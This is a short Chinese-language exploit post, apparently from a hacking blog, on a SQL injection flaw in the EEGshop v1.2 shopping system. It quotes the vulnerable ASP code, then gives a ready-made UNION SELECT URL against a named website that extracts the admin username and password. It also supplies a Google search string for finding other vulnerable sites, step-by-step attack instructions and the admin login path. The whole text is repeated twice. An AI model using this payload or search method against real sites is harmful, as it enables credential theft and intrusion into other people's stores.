易易购网上购物系统 EEGshop v1.2SQL注入漏洞
问题在user/shhr_inc.asp文件中,看此处代码:
if request.QueryString("action")="edit" then
id=request.QueryString("id")
if id="" then response.End
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from EEG_Consignee where username='"&checkFFSQLStr(request.cookies("eeg_username")("username"))&"' and id="&id,conn,1,1
只检查了username,忽略了id,在id处注入
注入语句:http://www.hfsydg.com/User/shhr_inc.asp?action=edit&id=24%20and%201=2%20union%20select%201,2,username,password,5,6,7,8,9%20from%20eeg_admin%20where%20id=1
Google:inurl:eList.Asp?Act 步骤:注册一用户→[继续填写详细资料]→收 货 人→添加收货人→随便添加一个→修改→此时可在地址栏看到id信息,注入即可。后台:admin/Login.Asp
问题在user/shhr_inc.asp文件中,看此处代码:
if request.QueryString("action")="edit" then
id=request.QueryString("id")
if id="" then response.End
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from EEG_Consignee where username='"&checkFFSQLStr(request.cookies("eeg_username")("username"))&"' and id="&id,conn,1,1
只检查了username,忽略了id,在id处注入
注入语句:http://www.hfsydg.com/User/shhr_inc.asp?action=edit&id=24%20and%201=2%20union%20select%201,2,username,password,5,6,7,8,9%20from%20eeg_admin%20where%20id=1
Google:inurl:eList.Asp?Act 步骤:注册一用户→[继续填写详细资料]→收 货 人→添加收货人→随便添加一个→修改→此时可在地址栏看到id信息,注入即可。后台:admin/Login.Asp
来自:Shaun'S Blog
